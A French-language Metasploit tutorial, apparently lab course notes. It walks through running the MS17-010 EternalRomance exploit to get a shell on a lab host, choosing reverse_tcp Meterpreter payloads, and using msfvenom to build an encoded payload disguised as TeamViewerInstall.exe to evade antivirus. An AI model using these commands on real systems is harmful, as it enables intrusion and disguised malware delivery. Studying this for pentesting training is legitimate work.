Metasploit

Metasploit:

Metasploit est une plateforme de test de pénétration (pentesting) open source largement utilisée par les professionnels de la sécurité informatique pour évaluer la vulnérabilité des systèmes informatiques. Il fournit un ensemble d'outils et de ressources permettant de découvrir, d'exploiter et de sécuriser les failles de sécurité dans les réseaux, les systèmes d'exploitation, les applications et d'autres composants informatiques. En résumé, Metasploit est un cadre complet pour effectuer des tests d'intrusion et des audits de sécurité.

Par défaut, tous les fichiers de base liés à Metasploit Framework peuvent être trouvés /usr/share/metasploit-framework

Modules:

Les modules détaillés ci-dessus sont répartis en catégories distinctes dans ce dossier. Nous les détaillerons dans les sections suivantes. Ils sont contenus dans les dossiers suivante:

Plugins:

Les plugins offrent au pentester plus de flexibilité lors de leur utilisation msfconsolepuisqu'ils peuvent facilement être chargés manuellement ou automatiquement selon les besoins pour fournir des fonctionnalités et une automatisation supplémentaires lors de notre évaluation.

Scénarios:

Fonctionnalité Meterpreter et autres scripts utiles.

Outils:

Utilitaires de ligne de commande pouvant être appelés directement depuis le msfconsolemenu

MSFconsole

Structure d'engagement de MSF

La structure d’engagement du MSF peut être divisée en cinq catégories principales.

Énumération
Préparation
Exploitation
Élévation des privilèges
Post-Exploitation

Cette division nous permet de trouver et de sélectionner plus facilement les fonctionnalités MSF appropriées de manière plus structurée et de travailler avec elles en conséquence. Chacune de ces catégories comprend différentes sous-catégories destinées à des fins spécifiques. Il s'agit par exemple de la validation des services et de la recherche sur les vulnérabilités.

Components

Recherche de modules:

Une fois que nous sommes dans le `msfconsole`, nous pouvons sélectionner parmi une longue liste contenant tous les modules Metasploit disponibles. Chacun d'entre eux est structuré en dossiers, qui ressembleront à ceci :

Syntaxe:

<No.> <type>/<os>/<service>/<name>

Exemple

794 exploit/windows/ftp/scriptftp_list

NO:

Le No.tag sera affiché pour sélectionner l'exploit que nous souhaitons par la suite lors de nos recherches. Nous verrons No.plus tard à quel point le tag peut être utile pour sélectionner des modules Metasploit spécifiques.

Type:

Type:

Description

Auxiliary

Fonctionnalités d'analyse, de fuzzing, de détection et d'administration. Offrez une assistance et des fonctionnalités supplémentaires.

Encoders

Assurez-vous que les charges utiles sont intactes jusqu'à leur destination.

Exploits

Définis comme des modules qui exploitent une vulnérabilité qui permettra la livraison de la charge utile.

NOPs

(Aucun code d'opération) Gardez les tailles de charge utile cohérentes entre les tentatives d'exploitation.

Payloads

Le code s'exécute à distance et rappelle la machine de l'attaquant pour établir une connexion (ou un shell).

Plugins

Des scripts supplémentaires peuvent être intégrés dans une évaluation msfconsoleet coexister.

Post

Large gamme de modules pour collecter des informations, approfondir, etc.

OS:
La OSbalise spécifie le système d'exploitation et l'architecture pour lesquels le module a été créé. Naturellement, différents systèmes d'exploitation nécessitent l'exécution de codes différents pour obtenir les résultats souhaités
Service:
La Servicebalise fait référence au service vulnérable qui s'exécute sur la machine cible. Pour certains modules, tels que ceux auxiliaryde ou post, cette balise peut faire référence à une activité plus générale comme gather, faisant référence à la collecte d'informations d'identification, par exemple.
Name:
Enfin, la Namebalise explique l’action réelle qui peut être effectuée à l’aide de ce module créé dans un but précis.

MSF - Fonction de recherche

Par exemple, nous pouvons essayer de trouver l' EternalRomanceexploit pour les anciens systèmes d'exploitation Windows. Cela pourrait ressembler à ceci :

search eternalromance

Recherche spécifique:

Nous pouvons également rendre notre recherche un peu plus grossière et la réduire à une seule catégorie de services. Par exemple, pour le CVE, nous pourrions spécifier l'année ( cve:<year>), la plateforme Windows ( platform:<os>), le type de module que nous souhaitons trouver ( type:<auxiliary/exploit/post>), le rang de fiabilité ( rank:<rank>) et le nom de la recherche ( <pattern>). Cela réduirait nos résultats à ceux qui correspondent à tous les éléments ci-dessus.

search type:exploit platform:windows cve:2021 rank:excellent microsoft

Utilisation des modules:

Pour sélectionner notre premier module, nous devons d'abord en trouver un. Supposons que nous ayons une cible exécutant une version de SMB vulnérable aux exploits EternalRomance (MS17_010). Nous avons constaté que le port 445 du serveur SMB est ouvert lors de l'analyse de la cible.

Recherche de MS17_010

search ms17_010

MSF - Sélectionner un module

Pour utiliser un module dans Metasploit, commencez par insérer la commande use suivie du numéro de module souhaité, puis utilisez la commande options pour afficher les détails et configurations disponibles pour ce module.

Matching Modules
================

   #  Name                                  Disclosure Date  Rank    Check  Description
   -  ----                                  ---------------  ----    -----  -----------
   0  exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   1  auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   
   
msf6 > use 0
msf6 exploit(windows/smb/ms17_010_psexec) > options

Module options (exploit/windows/smb/ms17_010_psexec): 

   Name                  Current Setting                          Required  Description
   ----                  ---------------                          --------  -----------
   DBGTRACE              false                                    yes       Show extra debug trace info
   LEAKATTEMPTS          99                                       yes       How many times to try to leak transaction
   NAMEDPIPE                                                      no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wo  yes       List of named pipes to check
                         rdlists/named_pipes.txt
   RHOSTS                                                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework
                                                                            /wiki/Using-Metasploit
   RPORT                 445                                      yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                            no        Service description to to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                           no        The service display name
   SERVICE_NAME                                                   no        The service name
   SHARE                 ADMIN$                                   yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a no
                                                                            rmal read/write folder share
   SMBDomain             .                                        no        The Windows domain to use for authentication
   SMBPass                                                        no        The password for the specified username
   SMBUser                                                        no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

Informations sur le module

Nous pouvons utiliser la commande infoaprès avoir sélectionné le module si nous voulons en savoir plus sur le module. Cela nous donnera une série d'informations qui peuvent être importantes pour nous.

msf6 exploit(windows/smb/ms17_010_psexec) > info

       Name: MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
     Module: exploit/windows/smb/ms17_010_psexec
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-03-14

Provided by:
  sleepya
  zerosum0x0
  Shadow Brokers
  Equation Group

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   PowerShell
  2   Native upload
  3   MOF upload

Check supported:
  Yes

Basic options:
  Name                  Current Setting                          Required  Description
  ----                  ---------------                          --------  -----------
  DBGTRACE              false                                    yes       Show extra debug trace info
  LEAKATTEMPTS          99                                       yes       How many times to try to leak transaction
  NAMEDPIPE                                                      no        A named pipe that can be connected to (leave blank for auto)
  NAMED_PIPES           /usr/share/metasploit-framework/data/wo  yes       List of named pipes to check
                        rdlists/named_pipes.txt
  RHOSTS                                                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/
                                                                           wiki/Using-Metasploit
  RPORT                 445                                      yes       The Target port (TCP)
  SERVICE_DESCRIPTION                                            no        Service description to to be used on target for pretty listing
  SERVICE_DISPLAY_NAME                                           no        The service display name
  SERVICE_NAME                                                   no        The service name
  SHARE                 ADMIN$                                   yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a nor
                                                                           mal read/write folder share
  SMBDomain             .                                        no        The Windows domain to use for authentication
  SMBPass                                                        no        The password for the specified username
  SMBUser                                                        no        The username to authenticate as

Payload information:
  Space: 3072

Description:
  This module will exploit SMB with vulnerabilities in MS17-010 to 
  achieve a write-what-where primitive. This will then be used to 
  overwrite the connection session information with as an 
  Administrator session. From there, the normal psexec payload code 
  execution is done. Exploits a type confusion between Transaction and 
  WriteAndX requests and a race condition in Transaction requests, as 
  seen in the EternalRomance, EternalChampion, and EternalSynergy 
  exploits. This exploit chain is more reliable than the EternalBlue 
  exploit, but requires a named pipe.

References:
  https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/MS17-010
  https://nvd.nist.gov/vuln/detail/CVE-2017-0143
  https://nvd.nist.gov/vuln/detail/CVE-2017-0146
  https://nvd.nist.gov/vuln/detail/CVE-2017-0147
  https://github.com/worawit/MS17-010
  https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf
  https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/

Also known as:
  ETERNALSYNERGY
  ETERNALROMANCE
  ETERNALCHAMPION
  ETERNALBLUE

Spécification de la cible

Une fois que nous sommes convaincus que le module sélectionné est le bon pour notre objectif, nous devons définir certaines spécifications pour personnaliser le module afin de l'utiliser avec succès sur notre hôte cible, comme la définition de la cible ( RHOSTou RHOSTS).

set RHOSTS 10.10.10.100

De plus, il existe l'option setg, qui spécifie les options sélectionnées par nous comme permanentes jusqu'au redémarrage du programme.

Exécution d'exploits

Une fois que tout est configuré et prêt à être lancé, nous pouvons procéder au lancement de l'attaque. Commande : run

msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.14.15:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Command shell session 1 opened (10.10.14.15:4444 -> 10.10.10.40:49158) at 2020-08-13 21:37:21 +0000
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


meterpreter> shell

C:\Windows\system32>

Targets

Show Targets:

La show targetscommande émise dans une vue de module d'exploitation affichera toutes les cibles vulnérables disponibles pour cet exploit spécifique. Si vous laissez la sélection sur , Automaticmsfconsole saura qu'il doit effectuer une détection de service sur la cible donnée avant de lancer une attaque réussie.

Cependant, si nous savons quelles versions s’exécutent sur notre cible, nous pouvons utiliser la set target <index no.>commande pour choisir une cible dans la liste.

msf6 exploit(windows/browser/ie_execcommand_uaf) > set target 6

target => 6

Payloads:

Dans Payload Metasploit, un module aide le module d'exploitation à renvoyer (généralement) un shell à l'attaquant. Les charges utiles sont envoyées avec l'exploit lui-même pour contourner les procédures de fonctionnement standard du service vulnérable ( exploits job), puis s'exécutent sur le système d'exploitation cible pour renvoyer généralement une connexion inverse à l'attaquant et établir une prise de position ( payload's job).

Il existe trois types différents de modules de charge utile dans le framework Metasploit : Singles, Stagers et Stages.

Payloads Single :

Une payload simple contient tout le code nécessaire pour l'exploit et l'exécution dans une seule charge utile autonome. Cela les rend plus stables, car il n'y a qu'un seul élément à exécuter. Cependant, elles peuvent être limitées par leur taille, car certaines attaques ne supportent pas de payloads trop volumineux. Elles sont idéales pour des actions immédiates, comme ajouter un utilisateur ou démarrer un processus sur la cible.

Payloads Stagers:

Les payloads de type stageur fonctionnent avec des charges utiles de type "Stage" en divisant la charge en plusieurs étapes. Un stageur réside sur le système de l'attaquant et initie la connexion réseau avec la cible lorsque l’étape est exécutée sur la machine distante. Ils sont conçus pour être petits et fiables, facilitant ainsi l’établissement de connexions. Les stageurs Windows sont également disponibles en versions "NX" (pour la compatibilité avec la protection DEP) et "NO-NX", avec NX étant plus volumineux mais adapté aux systèmes modernes.

Payloads Stages:

Les payloads d’étapes sont des composants téléchargés par les stageurs pour des fonctionnalités avancées et sans limitation de taille. Ils sont utilisés pour des charges complexes comme Meterpreter ou l’injection VNC. Pour minimiser les erreurs, les stages utilisent des stageurs intermédiaires pour garantir la stabilité du téléchargement. Ils sont particulièrement adaptés aux attaques multi-étapes nécessitant un flux de données fiable et soutenu.

Staged Payloads:

Charges utiles par étapes

En tant qu'utilisateur de Metasploit, nous les rencontrerons sous les noms communs reverse_tcp, reverse_https, et bind_tcp. Par exemple, sous la show payloadscommande , vous pouvez rechercher les charges utiles qui ressemblent à ce qui suit :

Payloads Meterpreter:

Meterpreter est une charge utile avancée utilisant l'injection DLL pour établir une connexion stable et persistante, entièrement en mémoire, rendant sa détection difficile. Elle permet de charger dynamiquement des scripts et plugins. Une fois lancée, elle ouvre une session offrant des commandes spécifiques pour contrôler le système cible : capture de frappes, récupération de mots de passe, écoute du microphone, etc.

Searching for Payloads:

Pour sélectionner notre première charge utile, nous devons savoir ce que nous voulons faire sur la machine cible. Par exemple, si nous optons pour la persistance des accès, nous souhaiterons probablement sélectionner une charge utile Meterpreter.

En parcourant la liste ci-dessus, nous trouvons la section contenant Meterpreter Payloads for Windows(x64).

   515  windows/x64/meterpreter/bind_ipv6_tcp                                manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
   516  windows/x64/meterpreter/bind_ipv6_tcp_uuid                           manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
   517  windows/x64/meterpreter/bind_named_pipe                              manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
   518  windows/x64/meterpreter/bind_tcp                                     manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
   519  windows/x64/meterpreter/bind_tcp_rc4                                 manual  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   520  windows/x64/meterpreter/bind_tcp_uuid                                manual  No     Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
   521  windows/x64/meterpreter/reverse_http                                 manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   522  windows/x64/meterpreter/reverse_https                                manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
   523  windows/x64/meterpreter/reverse_named_pipe                           manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
   524  windows/x64/meterpreter/reverse_tcp                                  manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
   525  windows/x64/meterpreter/reverse_tcp_rc4                              manual  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   526  windows/x64/meterpreter/reverse_tcp_uuid                             manual  No     Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
   527  windows/x64/meterpreter/reverse_winhttp                              manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
   528  windows/x64/meterpreter/reverse_winhttps                             manual  No     Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
   529  windows/x64/meterpreter_bind_named_pipe                              manual  No     Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
   530  windows/x64/meterpreter_bind_tcp                                     manual  No     Windows Meterpreter Shell, Bind TCP Inline (x64)
   531  windows/x64/meterpreter_reverse_http                                 manual  No     Windows Meterpreter Shell, Reverse HTTP Inline (x64)
   532  windows/x64/meterpreter_reverse_https                                manual  No     Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
   533  windows/x64/meterpreter_reverse_ipv6_tcp                             manual  No     Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
   534  windows/x64/meterpreter_reverse_tcp                                  manual  No     Windows Meterpreter Shell, Reverse TCP Inline x64

Searching for Specific Payload:

On pouvons également utiliser grepin pour filtrer des termes spécifiques. Cela accélérerait la recherche et, par conséquent, notre sélection.

grep meterpreter show payloads

Nous pouvons maintenant ajouter une autre grepcommande après la première et rechercher reverse_tcp.

grep meterpreter grep reverse_tcp show payloads

Select Payload:

Nous l'utilisons set payload <no.>uniquement après avoir sélectionné un module Exploit pour commencer.

msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload 15

payload => windows/x64/meterpreter/reverse_tcp

Using Payloads:

Pour la partie Exploit, nous devrons définir les éléments suivants :

Paramètre

Description

RHOSTS

L'adresse IP de l'hôte distant, la machine cible.

RPORT

Le Port de l'hôte distant.

Pour la partie charge utile, nous devrons définir les éléments suivants :

Paramètre

Description

LHOST

L'adresse IP de l'hôte, la machine de l'attaquant.

LPORT

Ne nécessite pas de modification, il suffit de vérifier que le port n'est pas déjà utilisé.

Payload Types:

Charge utile

Description

generic/custom

Auditeur générique, multi-usage

generic/shell_bind_tcp

Écouteur générique, multi-usage, shell normal, liaison de connexion TCP

generic/shell_reverse_tcp

Écouteur générique, multi-usage, shell normal, connexion TCP inversée

windows/x64/exec

Exécute une commande arbitraire (Windows x64)

windows/x64/loadlibrary

Charge un chemin de bibliothèque x64 arbitraire

windows/x64/messagebox

Génère une boîte de dialogue via MessageBox à l'aide d'un titre, d'un texte et d'une icône personnalisables

windows/x64/shell_reverse_tcp

Shell normal, charge utile unique, connexion TCP inversée

windows/x64/shell/reverse_tcp

Shell normal, stager + stage, connexion TCP inversée

windows/x64/shell/bind_ipv6_tcp

Shell normal, stager + stage, liaison IPv6 TCP stager

windows/x64/meterpreter/$

Charge utile Meterpreter + variétés ci-dessus

windows/x64/powershell/$

Sessions PowerShell interactives + variétés ci-dessus

windows/x64/vncinject/$

Serveur VNC (injection réflective) + variétés ci-dessus

Encoders

Au cours des 15 années d'existence du framework Metasploit, Encodersnous avons contribué à rendre les charges utiles compatibles avec différentes architectures de processeurs tout en contribuant à l'évasion antivirus. Encodersentrent en jeu avec le rôle de modifier la charge utile pour qu'elle s'exécute sur différents systèmes d'exploitation et architectures. Ces architectures incluent :

x64

x86

sparc

ppc

mips

Selecting an Encoder:

Si nous voulions créer notre charge utile personnalisée, nous pourrions le faire via msfpayload, mais nous devrions l'encoder en fonction de l'architecture du système d'exploitation cible en utilisant msfencodeafterward. Un canal prendrait la sortie d'une commande et l'enverrait à la suivante, ce qui générerait une charge utile encodée, prête à être envoyée et exécutée sur la machine cible.

msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b '\x00' -f perl -e x86/shikata_ga_nai

Generating Payload - Without Encoding:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl

Nous devrions maintenant regarder la première ligne du $bufet voir comment elle change lors de l'application d'un encodeur comme shikata_ga_nai.

Generating Payload - With Encoding:

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -b "\x00" -f perl -e x86/shikata_ga_nai

Shikata Ga Nai Encoding:

Prenons l'exemple ci-dessus tel quel, un exemple hypothétique. Si nous devions encoder une charge utile exécutable une seule fois avec SGN, elle serait très probablement détectée par la plupart des antivirus actuels. Examinons cela un instant. En prenant msfvenom, l'indice du Framework qui traite de la génération de charge utile et des schémas d'encodage, nous avons l'entrée suivante :

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ./TeamViewerInstall.exe

Cela va générer une charge utile au exeformat TeamViewerInstall.exe, qui est censée fonctionner sur les processeurs d'architecture x86 pour la plate-forme Windows, avec une charge utile de shell reverse_tcp Meterpreter cachée, codée une fois avec le schéma Shikata Ga Nai. Prenons le résultat et chargeons-le sur VirusTotal.

Une meilleure option serait d'essayer de l'exécuter via plusieurs itérations du même schéma de codage :

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=8080 -e x86/shikata_ga_nai -f exe -i 10 -o /root/Desktop/TeamViewerInstall.exe

Comme nous pouvons le constater, cela ne suffit toujours pas pour échapper aux antivirus. Il existe un grand nombre de produits qui détectent encore la charge utile. Alternativement, Metasploit propose un outil appelé msf-virustotalque nous pouvons utiliser avec une clé API pour analyser nos charges utiles. Cependant, cela nécessite une inscription gratuite sur VirusTotal.

VirusTotal:

jord4n@htb[/htb]$ msf-virustotal -k <API key> -f TeamViewerInstall.exe

[*] Using API key: <API key>
[*] Please wait while I upload TeamViewerInstall.exe...
[*] VirusTotal: Scan request successfully queued, come back later for the report
[*] Sample MD5 hash    : 4f54cc46e2f55be168cc6114b74a3130
[*] Sample SHA1 hash   : 53fcb4ed92cf40247782de41877b178ef2a9c5a9
[*] Sample SHA256 hash : 66894cbecf2d9a31220ef811a2ba65c06fdfecddbc729d006fdab10e43368da8
[*] Analysis link: https://www.virustotal.com/gui/file/<SNIP>/detection/f-<SNIP>-1651750343
[*] Requesting the report...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Received code -2. Waiting for another 60 seconds...
[*] Analysis Report: TeamViewerInstall.exe (51 / 68): 66894cbecf2d9a31220ef811a2ba65c06fdfecddbc729d006fdab10e43368da8
==================================================================================================================

 Antivirus             Detected  Version                                                         Result                                                     Update
 ---------             --------  -------                                                         ------                                                     ------
 ALYac                 true      1.1.3.1                                                         Trojan.CryptZ.Gen                                          20220505
 APEX                  true      6.288                                                           Malicious                                                  20220504
 AVG                   true      21.1.5827.0                                                     Win32:SwPatch [Wrm]                                        20220505
 Acronis               true      1.2.0.108                                                       suspicious                                                 20220426
 Ad-Aware              true      3.0.21.193                                                      Trojan.CryptZ.Gen                                          20220505
 AhnLab-V3             true      3.21.3.10230                                                    Trojan/Win32.Shell.R1283                                   20220505
 Alibaba               false     0.3.0.5                                                                                                                    20190527
 Antiy-AVL             false     3.0                                                                                                                        20220505
 Arcabit               true      1.0.0.889                                                       Trojan.CryptZ.Gen                                          20220505
 Avast                 true      21.1.5827.0                                                     Win32:SwPatch [Wrm]                                        20220505
 Avira                 true      8.3.3.14                                                        TR/Patched.Gen2                                            20220505
 Baidu                 false     1.0.0.2                                                                                                                    20190318
 BitDefender           true      7.2                                                             Trojan.CryptZ.Gen                                          20220505
 BitDefenderTheta      true      7.2.37796.0                                                     Gen:NN.ZexaF.34638.eq1@aC@Q!ici                            20220428
 Bkav                  true      1.3.0.9899                                                      W32.FamVT.RorenNHc.Trojan                                  20220505
 CAT-QuickHeal         true      14.00                                                           Trojan.Swrort.A                                            20220505
 CMC                   false     2.10.2019.1                                                                                                                20211026
 ClamAV                true      0.105.0.0                                                       Win.Trojan.MSShellcode-6360728-0                           20220505
 Comodo                true      34592                                                           TrojWare.Win32.Rozena.A@4jwdqr                             20220505
 CrowdStrike           true      1.0                                                             win/malicious_confidence_100% (D)                          20220418
 Cylance               true      2.3.1.101                                                       Unsafe                                                     20220505
 Cynet                 true      4.0.0.27                                                        Malicious (score: 100)                                     20220505
 Cyren                 true      6.5.1.2                                                         W32/Swrort.A.gen!Eldorado                                  20220505
 DrWeb                 true      7.0.56.4040                                                     Trojan.Swrort.1                                            20220505
 ESET-NOD32            true      25218                                                           a variant of Win32/Rozena.AA                               20220505
 Elastic               true      4.0.36                                                          malicious (high confidence)                                20220503
 Emsisoft              true      2021.5.0.7597                                                   Trojan.CryptZ.Gen (B)                                      20220505
 F-Secure              false     18.10.978-beta,1651672875v,1651675347h,1651717942c,1650632236t                                                             20220505
 FireEye               true      35.24.1.0                                                       Generic.mg.4f54cc46e2f55be1                                20220505
 Fortinet              true      6.2.142.0                                                       MalwThreat!0971IV                                          20220505
 GData                 true      A:25.32960B:27.27244                                            Trojan.CryptZ.Gen                                          20220505
 Gridinsoft            true      1.0.77.174                                                      Trojan.Win32.Swrort.zv!s2                                  20220505
 Ikarus                true      6.0.24.0                                                        Trojan.Win32.Swrort                                        20220505
 Jiangmin              false     16.0.100                                                                                                                   20220504
 K7AntiVirus           true      12.10.42191                                                     Trojan ( 001172b51 )                                       20220505
 K7GW                  true      12.10.42191                                                     Trojan ( 001172b51 )                                       20220505
 Kaspersky             true      21.0.1.45                                                       HEUR:Trojan.Win32.Generic                                  20220505
 Kingsoft              false     2017.9.26.565                                                                                                              20220505
 Lionic                false     7.5                                                                                                                        20220505
 MAX                   true      2019.9.16.1                                                     malware (ai score=89)                                      20220505
 Malwarebytes          true      4.2.2.27                                                        Trojan.Rozena                                              20220505
 MaxSecure             true      1.0.0.1                                                         Trojan.Malware.300983.susgen                               20220505
 McAfee                true      6.0.6.653                                                       Swrort.i                                                   20220505
 McAfee-GW-Edition     true      v2019.1.2+3728                                                  BehavesLike.Win32.Swrort.lh                                20220505
 MicroWorld-eScan      true      14.0.409.0                                                      Trojan.CryptZ.Gen                                          20220505
 Microsoft             true      1.1.19200.5                                                     Trojan:Win32/Meterpreter.A                                 20220505
 NANO-Antivirus        true      1.0.146.25588                                                   Virus.Win32.Gen-Crypt.ccnc                                 20220505
 Paloalto              false     0.9.0.1003                                                                                                                 20220505
 Panda                 false     4.6.4.2                                                                                                                    20220504
 Rising                true      25.0.0.27                                                       [email protected] (RDMK:cmRtazqDtX58xtB5RYP2bMLR5Bv1)  20220505
 SUPERAntiSpyware      true      5.6.0.1032                                                      Trojan.Backdoor-Shell                                      20220430
 Sangfor               true      2.14.0.0                                                        Trojan.Win32.Save.a                                        20220415
 SentinelOne           true      22.2.1.2                                                        Static AI - Malicious PE                                   20220330
 Sophos                true      1.4.1.0                                                         ML/PE-A + Mal/EncPk-ACE                                    20220505
 Symantec              true      1.17.0.0                                                        Packed.Generic.347                                         20220505
 TACHYON               false     2022-05-05.02                                                                                                              20220505
 Tencent               true      1.0.0.1                                                         Trojan.Win32.Cryptz.za                                     20220505
 TrendMicro            true      11.0.0.1006                                                     BKDR_SWRORT.SM                                             20220505
 TrendMicro-HouseCall  true      10.0.0.1040                                                     BKDR_SWRORT.SM                                             20220505
 VBA32                 false     5.0.0                                                                                                                      20220505
 ViRobot               true      2014.3.20.0                                                     Trojan.Win32.Elzob.Gen                                     20220504
 VirIT                 false     9.5.188                                                                                                                    20220504
 Webroot               false     1.0.0.403                                                                                                                  20220505
 Yandex                true      5.5.2.24                                                        Trojan.Rosena.Gen.1                                        20220428
 Zillya                false     2.0.0.4625                                                                                                                 20220505
 ZoneAlarm             true      1.0                                                             HEUR:Trojan.Win32.Generic                                  20220505
 Zoner                 false     2.2.2.0                                                                                                                    20220504
 tehtris               false     v0.1.2                                                                                                                     20220505

Databases:

Databasessont msfconsoleutilisés pour suivre vos résultats. Il n'est pas surprenant que lors d'évaluations de machines encore plus complexes, et encore moins de réseaux entiers, les choses peuvent devenir un peu floues et compliquées en raison de la quantité considérable de résultats de recherche, de points d'entrée, de problèmes détectés, d'informations d'identification découvertes, etc. C'est ici que les bases de données entrent en jeu. Msfconsoleprend en charge de manière intégrée le système de base de données PostgreSQL. Grâce à lui, nous disposons d'un accès direct, rapide et facile aux résultats d'analyse avec la possibilité supplémentaire d'importer et d'exporter les résultats en conjonction avec des outils tiers. Les entrées de base de données peuvent également être utilisées pour configurer directement les paramètres du module Exploit avec les résultats déjà existants.

Setting up the Database

Tout d'abord, nous devons nous assurer que le serveur PostgreSQL est opérationnel sur notre machine hôte. Pour ce faire, saisissez la commande suivante :

Statut de PostgreSQL

sudo service postgresql status

Démarrer PostgreSQL

sudo systemctl start postgresql

Lancer une base de données

sudo msfdb init

Connexion à la base de données initiée

sudo msfdb run

Si, toutefois, nous avons déjà configuré la base de données et que nous ne sommes pas en mesure de modifier le mot de passe en nom d'utilisateur MSF, procédez avec ces commandes :

Réinitialisation de la base de données

msfdb reinit
cp /usr/share/metasploit-framework/config/database.yml ~/.msf4/
sudo service postgresql restart
msfconsole -q

Using the Database

help database

Database Backend Commands
=========================

    Command           Description
    -------           -----------
    db_connect        Connect to an existing database
    db_disconnect     Disconnect from the current database instance
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache
    db_status         Show the current database status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
